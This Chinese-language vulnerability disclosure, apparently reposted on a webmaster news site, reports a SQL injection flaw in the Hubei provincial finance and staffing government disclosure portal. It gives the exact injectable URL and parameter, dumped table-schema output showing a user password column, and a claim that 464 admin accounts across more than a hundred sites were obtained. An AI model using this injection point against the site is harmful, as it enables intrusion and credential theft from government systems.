湖北省某政务公开网SQL注入漏洞可影响大量下属机构下载

湖北省某政务公开网SQL注入漏洞可影响大量下属机构湖北省财政与编制政务公开网SQL注入影响上百站点,包括湖北省各个县市的财政与编制政务公开网

SQL注入点:

http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?siteID=8a8080820b78cd84010b79331b92001e

Table: CMS_USER_USER

[12 columns]

+------------------+----------+

| Column | Type |

+------------------+----------+

| USER_A_TEL | VARCHAR2 |

| USER_B_TEL | VARCHAR2 |

| USER_CJSJ | DATE |

| USER_DESCRIPTION | VARCHAR2 |

| USER_EMAIL | VARCHAR2 |

| USER_ID | VARCHAR2 |

| USER_MSN | VARCHAR2 |

| USER_NAME | VARCHAR2 |

| USER_PASSWORD | VARCHAR2 |

| USER_QQ | VARCHAR2 |

| USER_XGSJ | DATE |

| USER_XM | VARCHAR2 |

+------------------+----------+



通过此注入点最终获取到后台登录用户464个,影响的站点至少有上百

襄阳财政与编制政务公开网
武汉财政与编制政务公开网
宜昌财政与编制政务公开网

影响的站点:

修复方案:

过滤

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细